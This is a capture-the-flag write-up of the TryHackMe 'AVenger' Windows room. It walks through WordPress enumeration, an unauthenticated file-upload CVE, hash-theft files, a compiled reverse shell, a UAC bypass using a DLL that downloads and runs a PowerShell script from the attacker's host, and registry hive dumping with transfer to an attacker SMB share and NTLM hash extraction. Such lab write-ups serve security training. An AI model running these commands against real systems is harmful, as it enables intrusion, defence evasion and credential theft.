# AVenger - THM

[[_TOC_]]

## Summary

<!-- markdownlint-disable MD033 -->
<div align="center"><img src="images/0.png"></div>

AVenger is a fun, medium-rated THM Windows room created by [tryhackme](https://tryhackme.com/p/tryhackme) and [l4m3r8](https://tryhackme.com/p/l4m3r8).  
The theme of this room was to bypass AMSI, Defender, and AppLocker.

## Initial enumeration

```console
opcode@debian$ nmap -v -p- --min-rate 2000 10.10.226.245
Nmap scan report for 10.10.226.245
Host is up (0.16s latency).
Not shown: 65517 closed tcp ports (reset)
PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
443/tcp   open  https
445/tcp   open  microsoft-ds
3306/tcp  open  mysql
3389/tcp  open  ms-wbt-server
5985/tcp  open  wsman
7680/tcp  open  pando-pub
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown
49669/tcp open  unknown
49676/tcp open  unknown
49677/tcp open  unknown
```

```console
opcode@debian$ nmap -sC -sV -p 80,135,139,443,445,3306,3389,5985,7680,47001,49664,49665,49666,49667,49668,49669,49676,49677 -oN avenger.nmap 10.10.226.245
Nmap scan report for 10.10.226.245
Host is up (0.16s latency).

PORT      STATE SERVICE       VERSION
80/tcp    open  http          Apache httpd 2.4.56 (OpenSSL/1.1.1t PHP/8.0.28)
| http-ls: Volume /
| SIZE  TIME              FILENAME
| 3.5K  2022-06-15 16:07  applications.html
| 177   2022-06-15 16:07  bitnami.css
| -     2023-04-06 09:24  dashboard/
| 30K   2015-07-16 15:32  favicon.ico
| -     2023-06-27 09:26  gift/
| -     2023-06-27 09:04  img/
| 751   2022-06-15 16:07  img/module_table_bottom.png
| 337   2022-06-15 16:07  img/module_table_top.png
| -     2023-06-28 14:39  xampp/
|_
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Index of /
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
443/tcp   open  ssl/http      Apache httpd 2.4.56 (OpenSSL/1.1.1t PHP/8.0.28)
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
|_http-title: Index of /
| http-methods: 
|_  Potentially risky methods: TRACE
| http-ls: Volume /
| SIZE  TIME              FILENAME
| 3.5K  2022-06-15 16:07  applications.html
| 177   2022-06-15 16:07  bitnami.css
| -     2023-04-06 09:24  dashboard/
| 30K   2015-07-16 15:32  favicon.ico
| -     2023-06-27 09:26  gift/
| -     2023-06-27 09:04  img/
| 751   2022-06-15 16:07  img/module_table_bottom.png
| 337   2022-06-15 16:07  img/module_table_top.png
| -     2023-06-28 14:39  xampp/
|_
| tls-alpn: 
|_  http/1.1
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after:  2019-11-08T23:48:47
|_ssl-date: TLS randomness does not represent time
445/tcp   open  microsoft-ds?
3306/tcp  open  mysql         MySQL 5.5.5-10.4.28-MariaDB
| mysql-info: 
|   Protocol: 10
|   Version: 5.5.5-10.4.28-MariaDB
|   Thread ID: 9
|   Capabilities flags: 63486
|   Some Capabilities: Support41Auth, Speaks41ProtocolOld, SupportsCompression, SupportsTransactions, FoundRows, Speaks41ProtocolNew, SupportsLoadDataLocal, LongColumnFlag, ConnectWithDatabase, InteractiveClient, DontAllowDatabaseTableColumn, ODBCClient, IgnoreSpaceBeforeParenthesis, IgnoreSigpipes, SupportsMultipleResults, SupportsAuthPlugins, SupportsMultipleStatments
|   Status: Autocommit
|   Salt: )a/c(<3+{MN}MG]}")Ff
|_  Auth Plugin Name: mysql_native_password
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=gift
| Not valid before: 2024-01-28T18:01:49
|_Not valid after:  2024-07-29T18:01:49
| rdp-ntlm-info: 
|   Target_Name: GIFT
|   NetBIOS_Domain_Name: GIFT
|   NetBIOS_Computer_Name: GIFT
|   DNS_Domain_Name: gift
|   DNS_Computer_Name: gift
|   Product_Version: 10.0.17763
|_  System_Time: 2024-01-29T18:06:15+00:00
|_ssl-date: 2024-01-29T18:06:23+00:00; 0s from scanner time.
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
7680/tcp  open  pando-pub?
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49676/tcp open  msrpc         Microsoft Windows RPC
49677/tcp open  msrpc         Microsoft Windows RPC
Service Info: Hosts: localhost, www.example.com; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2024-01-29T18:06:12
|_  start_date: N/A
```

The services on ports 80 and 443 are the same. They list directories:

![1](images/1.png)

<http://10.10.226.245/dashboard/> takes us to the XAMPP dashboard and <http://10.10.226.245/gift/> redirects to <http://avenger.tryhackme/gift/>  
Therefore, we can update `/etc/hosts`:

```text
10.10.226.245 avenger.tryhackme
```

The page source of <http://avenger.tryhackme/gift/> indicates that WordPress is in use.  
Therefore, we can jump straight to Wordpress-specific enumeration.

## Wordpress enumeration with WPScan

WPScan is a well-known tool for Wordpress-specific enumeration. We need to register an account at <https://wpscan.com/register/> to receive the API Token.

```console
opcode@debian$ sudo gem install wpscan
opcode@debian$ wpscan --url http://avenger.tryhackme/gift/ -e vp,vt --api-token 6e...WA
```
The scan takes a while, and the result is enormous.  
We can go through the scan result and root out the false positives.

```text
[+] Headers
 | Interesting Entries:
 |  - Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
 |  - X-Powered-By: PHP/8.0.28
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://avenger.tryhackme/gift/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://avenger.tryhackme/gift/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://avenger.tryhackme/gift/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://avenger.tryhackme/gift/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 6.2.2 identified (Insecure, released on 2023-05-20).
 | Found By: Rss Generator (Passive Detection)
 |  - http://avenger.tryhackme/gift/feed/, <generator>https://wordpress.org/?v=6.2.2</generator>
 |  - http://avenger.tryhackme/gift/comments/feed/, <generator>https://wordpress.org/?v=6.2.2</generator>
 |
```

Basic enumeration so far. Next comes WordPress vulnerabilities:

```text
 | [!] 6 vulnerabilities identified:
 |
 | [!] Title: WP 5.6-6.3.1 - Contributor+ Stored XSS via Navigation Block
 |     Fixed in: 6.2.3
 |     References:
 |      - https://wpscan.com/vulnerability/cd130bb3-8d04-4375-a89a-883af131ed3a
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-38000
 |      - https://wordpress.org/news/2023/10/wordpress-6-3-2-maintenance-and-security-release/
 |
 | [!] Title: WP 5.6-6.3.1 - Reflected XSS via Application Password Requests
 |     Fixed in: 6.2.3
 |     References:
 |      - https://wpscan.com/vulnerability/da1419cc-d821-42d6-b648-bdb3c70d91f2
 |      - https://wordpress.org/news/2023/10/wordpress-6-3-2-maintenance-and-security-release/
 |
 | [!] Title: WP < 6.3.2 - Denial of Service via Cache Poisoning
 |     Fixed in: 6.2.3
 |     References:
 |      - https://wpscan.com/vulnerability/6d80e09d-34d5-4fda-81cb-e703d0e56e4f
 |      - https://wordpress.org/news/2023/10/wordpress-6-3-2-maintenance-and-security-release/
 |
 | [!] Title: WP < 6.3.2 - Subscriber+ Arbitrary Shortcode Execution
 |     Fixed in: 6.2.3
 |     References:
 |      - https://wpscan.com/vulnerability/3615aea0-90aa-4f9a-9792-078a90af7f59
 |      - https://wordpress.org/news/2023/10/wordpress-6-3-2-maintenance-and-security-release/
 |
 | [!] Title: WP < 6.3.2 - Contributor+ Comment Disclosure
 |     Fixed in: 6.2.3
 |     References:
 |      - https://wpscan.com/vulnerability/d35b2a3d-9b41-4b4f-8e87-1b8ccb370b9f
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39999
 |      - https://wordpress.org/news/2023/10/wordpress-6-3-2-maintenance-and-security-release/
 |
 | [!] Title: WP < 6.3.2 - Unauthenticated Post Author Email Disclosure
 |     Fixed in: 6.2.3
 |     References:
 |      - https://wpscan.com/vulnerability/19380917-4c27-4095-abf1-eba6f913b441
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-5561
 |      - https://wpscan.com/blog/email-leak-oracle-vulnerability-addressed-in-wordpress-6-3-2/
 |      - https://wordpress.org/news/2023/10/wordpress-6-3-2-maintenance-and-security-release/
```

They all are either low impact or need some level of authorization.  
Next are plugins:

```text
[i] Plugin(s) Identified:

[+] forminator
 | Location: http://avenger.tryhackme/gift/wp-content/plugins/forminator/
 | Last Updated: 2023-12-18T15:42:00.000Z
 | [!] The version is out of date, the latest version is 1.28.1
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | [!] 4 vulnerabilities identified:
 |
 | [!] Title: Forminator < 1.24.4 - Reflected XSS
 |     Fixed in: 1.24.4
 |     References:
 |      - https://wpscan.com/vulnerability/6d50d3cc-7563-42c4-977b-f834fee711da
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3134
 |      - https://www.onvio.nl/nieuws/research-day-discovering-vulnerabilities-in-wordpress-plugins
 |
 | [!] Title: Forminator < 1.25.0 - Unauthenticated Arbitrary File Upload
 |     Fixed in: 1.25.0
 |     References:
 |      - https://wpscan.com/vulnerability/fb8db268-77d9-47b5-ad41-e9c05f0e7523
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4596
 |      - https://www.exploit-db.com/exploits/51664/
 |
 | [!] Title: Forminator and Forminator Pro < 1.27.0 - Admin+ Stored Cross-Site Scripting
 |     Fixed in: 1.27.0
 |     References:
 |      - https://wpscan.com/vulnerability/229207bb-8f8d-4579-a8e2-54516474ccb4
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-5119
 |
 | [!] Title: Forminator < 1.28.0 - Admin+ Arbitrary File Upload
 |     Fixed in: 1.28.0
 |     References:
 |      - https://wpscan.com/vulnerability/7d1ead56-7db2-46c4-97ed-af008e9b5515
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6133
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/13cfa202-ab90-46c0-ab53-00995bfdcaa3
 |
 | Version: 1.24.1 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://avenger.tryhackme/gift/wp-content/plugins/forminator/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://avenger.tryhackme/gift/wp-content/plugins/forminator/readme.txt
```

Out of these, the unauthenticated arbitrary file upload (CVE-2023-4596) is the best candidate.

## CVE-2023-4596

Googling for CVE-2023-4596, we can find a PoC: <https://github.com/E1A/CVE-2023-4596/blob/main/exploit.py>  
But it was meant for a linux instance. I modified it for an OS-independent webshell: [CVE-2023-4596.py](CVE-2023-4596.py)

```console
opcode@debian$ python3 CVE-2023-4596.py --url 'http://avenger.tryhackme/gift/'

______                   _             _              ______  _____  _____ 
|@E1A |                 (_)           | |             | ___ \/  __ \|  ___|
| |_ ___  _ __ _ __ ___  _ _ __   __ _| |_ ___  _ __  | |_/ /| /  \/| |__  
|  _/ _ \| '__| '_ ` _ \| | '_ \ / _` | __/ _ \| '__| |    / | |    |  __| 
| || (_) | |  | | | | | | | | | | (_| | || (_) | |    | |\ \ | \__/\| |___ 
\_| \___/|_|  |_| |_| |_|_|_| |_|\__,_|\__\___/|_|    \_| \_| \____/\____/ 
                                                                           

[+] Extracted forminator_nonce: 9698b5690f
[+] Extracted form_id: 1176

[+] Sending payload to target
[+] Successful file upload!

Uploaded File Location: http://avenger.tryhackme/wp-content/uploads/2024/01/kApvawJniP.php

[+] Sending request to uploaded file...
[-] Server returned an unexpected response: 404
```

The uploaded file can't be reached. Even the images on the website present within `/wp-content/uploads/` are not loading.  
I suspect it is a poor fix to an unintended approach.  
While investigating the issue, I learnt that we could have directly utilized the form on the website to upload files:

![2](images/2.png)

## Initial reverse shell - executable file

Since the messages are reviewed, we can try uploading hash theft files. I used xct's [hashgrab](https://github.com/xct/hashgrab) to generate the files:

```console
opcode@debian$ python3 -m pip install pylnk3 --break-system-packages
opcode@debian$ wget https://raw.githubusercontent.com/xct/hashgrab/main/hashgrab.py
opcode@debian$ python3 hashgrab.py 10.17.79.7 opcode                
[*] Generating hash grabbing files..
[*] Written @opcode.scf
[*] Written @opcode.url
[*] Written opcode.library-ms
[*] Written desktop.ini
[*] Written lnk_927.ico
[+] Done, upload files to smb share and capture hashes with smbserver.py/responder
```

I started [Responder](https://github.com/lgandx/Responder):

```console
opcode@debian$ git clone https://github.com/lgandx/Responder.git
opcode@debian$ cd Responder
opcode@debian$ sudo ./Responder.py -I tun0 -Pv
```

I did not receive any encrypted Net-NTLMv2 challenge.  
I also tried putting a reverse shell, hoping they'd execute it.  
I used the code for `C Windows` from <https://www.revshells.com/>: [revshell.c](revshell.c)

```console
opcode@debian$ x86_64-w64-mingw32-gcc -o revshell.exe revshell.c -lws2_32
```

I expected the executable to get blocked by AV (since name of the room is AVenger), but I recieved a reverse shell instead:

```console
C:\Windows\system32> whoami
gift\hugo
```

I tried switching to [ConPtyShell](https://github.com/antonioCoco/ConPtyShell) but it got detected. Even my modified version got blocked.

## Post-shell enumeration

```console
C:\> whoami /all

USER INFORMATION
----------------

User Name SID                                         
========= ============================================
gift\hugo S-1-5-21-1966530601-3185510712-10604624-1008


GROUP INFORMATION
-----------------

Group Name                                                    Type             SID          Attributes                                        
============================================================= ================ ============ ==================================================
Everyone                                                      Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account and member of Administrators group Well-known group S-1-5-114    Group used for deny only                          
BUILTIN\Administrators                                        Alias            S-1-5-32-544 Group used for deny only                          
BUILTIN\Remote Desktop Users                                  Alias            S-1-5-32-555 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users                               Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                                                 Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE                                      Well-known group S-1-5-4      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                                                 Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users                              Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization                                Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account                                    Well-known group S-1-5-113    Mandatory group, Enabled by default, Enabled group
LOCAL                                                         Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication                              Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level                        Label            S-1-16-8192                                                    


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State   
============================= ============================== ========
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
```

`hugo` belongs to the `Administrators` group. It seems to be an easy win.

```console
C:\Users\hugo\Desktop> type user.txt
THM{XXXX_XXXXX_XXXXX_XXXXX_XXXXX_XXXXXXXXXXXXXX}
```

## UAC Bypass

```console
C:\Users> cd administrator
Access is denied.
```

We still don't have access.  
`hugo` is present in `Administrators` as well as in `Medium Mandatory Level`.  

We can check the status of UAC:

```console
C:\> reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System
    ConsentPromptBehaviorAdmin    REG_DWORD    0x5
    ConsentPromptBehaviorUser    REG_DWORD    0x3
    DelayedDesktopSwitchTimeout    REG_DWORD    0x0
    DisableAutomaticRestartSignOn    REG_DWORD    0x1
    DSCAutomationHostEnabled    REG_DWORD    0x2
    EnableCursorSuppression    REG_DWORD    0x1
    EnableFullTrustStartupTasks    REG_DWORD    0x2
    EnableInstallerDetection    REG_DWORD    0x1
    EnableLUA    REG_DWORD    0x1
    EnableSecureUIAPaths    REG_DWORD    0x1
    EnableUIADesktopToggle    REG_DWORD    0x0
    EnableUwpStartupTasks    REG_DWORD    0x2
    EnableVirtualization    REG_DWORD    0x1
    PromptOnSecureDesktop    REG_DWORD    0x1
    SupportFullTrustStartupTasks    REG_DWORD    0x1
    SupportUwpStartupTasks    REG_DWORD    0x1
    ValidateAdminCodeSignatures    REG_DWORD    0x0
    disablecad    REG_DWORD    0x0
    dontdisplaylastusername    REG_DWORD    0x0
    legalnoticecaption    REG_SZ    
    legalnoticetext    REG_SZ    
    scforceoption    REG_DWORD    0x0
    shutdownwithoutlogon    REG_DWORD    0x1
    undockwithoutlogon    REG_DWORD    0x1
```

`EnableLUA` and `PromptOnSecureDesktop` are set to `0x1`, meaning UAC is enabled.  
There are multiple ways to bypass UAC and most of them are documented in the project [UACME](https://github.com/hfiref0x/UACME)  
You can read the article [Exploring Windows UAC Bypasses: Techniques and Detection Strategies](https://www.elastic.co/security-labs/exploring-windows-uac-bypasses-techniques-and-detection-strategies) to learn more.

I tried using the newest method from UACME, method 78: [Bypassing UAC with SSPI Datagram Contexts](https://splintercod3.blogspot.com/p/bypassing-uac-with-sspi-datagram.html)

I compiled [SspiUacBypass](https://github.com/antonioCoco/SspiUacBypass) with Visual Studio.  
As usual, open the solution, update `PlatformToolset` to `v143`, and set the configuration to `x64 Release`, select `SspiUacBypass` in the solution explorer and use <kbd>Ctrl</kbd> + <kbd>B</kbd> to build.

```console
PS C:\windows\tasks> iwr 10.17.79.7:8000/SspiUacBypass.exe -o SspiUacBypass.exe
PS C:\windows\tasks> .\SspiUacBypass.exe
Program 'SspiUacBypass.exe' failed to run: Operation did not complete successfully because the file contains a virus 
or potentially unwanted softwareAt line:1 char:1
+ .\SspiUacBypass.exe
+ ~~~~~~~~~~~~~~~~~~~.
At line:1 char:1
+ .\SspiUacBypass.exe
+ ~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ResourceUnavailable: (:) [], ApplicationFailedException
    + FullyQualifiedErrorId : NativeCommandFailed
```

Since it got blocked by AV, I switched to a manual approach.  
Method 76 of UACME is the [iscsicpl autoelevate DLL Search Order hijacking UAC Bypass](https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC/blob/main/iscsicpl_BypassUAC/iscsicpl_BypassUAC.cpp).  

Create a `dll` for reverse shell:

```c
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>


int pwn()
{
    WinExec("powershell.exe IEX(IWR http://10.17.79.7:8000/shell_wstderr.ps1 -UseBasicParsing)", 0);
    return 0;
}

BOOL APIENTRY DllMain(HMODULE hModule,
    DWORD  ul_reason_for_call,
    LPVOID lpReserved
)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        pwn();
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}
```

Compile with:

```console
opcode@debian$ x86_64-w64-mingw32-gcc -shared -o iscsiexe.dll dllmain.c
```

Note that [shell_wstderr.ps1](shell_wstderr.ps1) is same as the one I used on [Stealth](https://gitlab.com/0pcode/thm-scribbles/-/blob/main/Stealth/README.md)  
Upload and test the `dll`:

```console
PS C:\windows\tasks> iwr 10.17.79.7:8000/iscsiexe.dll -o iscsiexe.dll
PS C:\windows\tasks> rundll32 C:\Windows\Tasks\iscsiexe.dll,pwn
```

Finally, overwrite `Path` for search order hijacking:

```console
PS C:\> $env:Path = 'C:\Windows\Tasks;' + $env:Path
PS C:\> echo $env:Path
C:\Windows\Tasks;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Program Files\Amazon\cfn-bootstrap\;C:\Users\hugo\AppData\Local\Microsoft\WindowsApps;

PS C:\> $currentPath = (Get-ItemProperty -Path "HKCU:\Environment").Path
PS C:\> Set-ItemProperty -Path "HKCU:\Environment" -Name "Path" -Value "C:\Windows\Tasks;$currentPath"


[localhost]: PS C:\> (Get-ItemProperty -Path "HKCU:\Environment").Path 
PS C:\> (Get-ItemProperty -Path "HKCU:\Environment").Path
C:\Windows\Tasks;C:\Users\hugo\AppData\Local\Microsoft\WindowsApps;
```

With the setup out the the way, we can execute the `iscsicpl.exe` in SysWOW64:

```console
PS C:\> C:\Windows\SysWOW64\iscsicpl.exe
```

It did not work, the `dll` did not get loaded. Perhaps I could not grasp the C++ code and made a mistake on any step.  
Therefore, I went back to a well documented UAC: method 62 on UACME, utilizing `computerdefaults.exe` and registry key manipulation:

```console
PS C:\> New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force
PS C:\> New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force
PS C:\> Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value "rundll32 C:\Windows\Tasks\iscsiexe.dll,pwn" -Force
PS C:\> Start-Process "C:\Windows\System32\ComputerDefaults.exe" -WindowStyle Hidden
```

I received a shell with `High Mandatory Level` label:

```console
C:\> whoami /all

USER INFORMATION
----------------

User Name SID                                         
========= ============================================
gift\hugo S-1-5-21-1966530601-3185510712-10604624-1008


GROUP INFORMATION
-----------------

Group Name                                                    Type             SID          Attributes                                                     
============================================================= ================ ============ =====================================================
Everyone                                                      Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account and member of Administrators group Well-known group S-1-5-114    Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators                                        Alias            S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Remote Desktop Users                                  Alias            S-1-5-32-555 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users                               Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                                                 Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE                                      Well-known group S-1-5-4      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                                                 Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users                              Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization                                Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account                                    Well-known group S-1-5-113    Mandatory group, Enabled by default, Enabled group
LOCAL                                                         Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication                              Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level                          Label            S-1-16-12288


PRIVILEGES INFORMATION
----------------------

Privilege Name                            Description                                                        State   
========================================= ================================================================== ========
SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Disabled
SeSecurityPrivilege                       Manage auditing and security log                                   Disabled
SeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Disabled
SeLoadDriverPrivilege                     Load and unload device drivers                                     Disabled
SeSystemProfilePrivilege                  Profile system performance                                         Disabled
SeSystemtimePrivilege                     Change the system time                                             Disabled
SeProfileSingleProcessPrivilege           Profile single process                                             Disabled
SeIncreaseBasePriorityPrivilege           Increase scheduling priority                                       Disabled
SeCreatePagefilePrivilege                 Create a pagefile                                                  Disabled
SeBackupPrivilege                         Back up files and directories                                      Disabled
SeRestorePrivilege                        Restore files and directories                                      Disabled
SeShutdownPrivilege                       Shut down the system                                               Disabled
SeDebugPrivilege                          Debug programs                                                     Enabled 
SeSystemEnvironmentPrivilege              Modify firmware environment values                                 Disabled
SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled 
SeRemoteShutdownPrivilege                 Force shutdown from a remote system                                Disabled
SeUndockPrivilege                         Remove computer from docking station                               Disabled
SeManageVolumePrivilege                   Perform volume maintenance tasks                                   Disabled
SeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled 
SeCreateGlobalPrivilege                   Create global objects                                              Enabled 
SeIncreaseWorkingSetPrivilege             Increase a process working set                                     Disabled
SeTimeZonePrivilege                       Change the time zone                                               Disabled
SeCreateSymbolicLinkPrivilege             Create symbolic links                                              Disabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Disabled
```

We can read the flag:

```console
C:\> type C:\Users\Administrator\Desktop\root.txt
THM{X_XXX_XX_XXXX_XXX_XXX}
```

## Post privilege escalation spoils

We can also dump credentials.  
I could not get [mimikatz](https://github.com/gentilkiwi/mimikatz) to work and had to use the old reliable:

```console
C:\> reg save HKLM\SAM SAM
The operation completed successfully.

C:\> reg save HKLM\SYSTEM SYSTEM
The operation completed successfully.

C:\> reg save HKLM\SECURITY SECURITY
The operation completed successfully.
```

After dumping the registry hives, we can set up an SMB server and transfer them to the attack VM:

```console
opcode@debian$ sudo smbserver.py -username opcode -password opcode -smb2support crate `pwd`
```

Add SMB share to the box with:

```console
C:\> net use \\10.17.79.7\crate opcode /user:opcode
The command completed successfully.
```

Now transfer:

```console
C:\> copy SAM \\10.17.79.7\crate
C:\> copy SYSTEM \\10.17.79.7\crate
C:\> copy SECURITY \\10.17.79.7\crate
```

`secretsdump.py` to extract local account hashes:

```console
opcode@debian$ secretsdump.py -sam SAM -security SECURITY -system SYSTEM LOCAL
Impacket v0.12.0.dev1+20240429.94657.af62accb - Copyright 2023 Fortra

[*] Target system bootKey: 0x36c8d26ec0df8b23ce63bcefa6e2d821
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:6f8f1f85f55b3f64123120b359a526a2:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:58f8e0214224aebc2c5f82fb7cb47ca1:::
hugo:1008:aad3b435b51404eeaad3b435b51404ee:6f8f1f85f55b3f64123120b359a526a2:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x0e88ce11d311d3966ca2422ac2708a4d707e00be
dpapi_userkey:0x8b68be9ef724e59070e7e3559e10078e36e8ab32
[*] NL$KM 
 0000   8D D2 8E 67 54 58 89 B1  C9 53 B9 5B 46 A2 B3 66   ...gTX...S.[F..f
 0010   D4 3B 95 80 92 7D 67 78  B7 1D F9 2D A5 55 B7 A3   .;...}gx...-.U..
 0020   61 AA 4D 86 95 85 43 86  E3 12 9E C4 91 CF 9A 5B   a.M...C........[
 0030   D8 BB 0D AE FA D3 41 E0  D8 66 3D 19 75 A2 D1 B2   ......A..f=.u...
NL$KM:8dd28e67545889b1c953b95b46a2b366d43b9580927d6778b71df92da555b7a361aa4d8695854386e3129ec491cf9a5bd8bb0daefad341e0d8663d1975a2d1b2
[*] Cleaning up... 
```
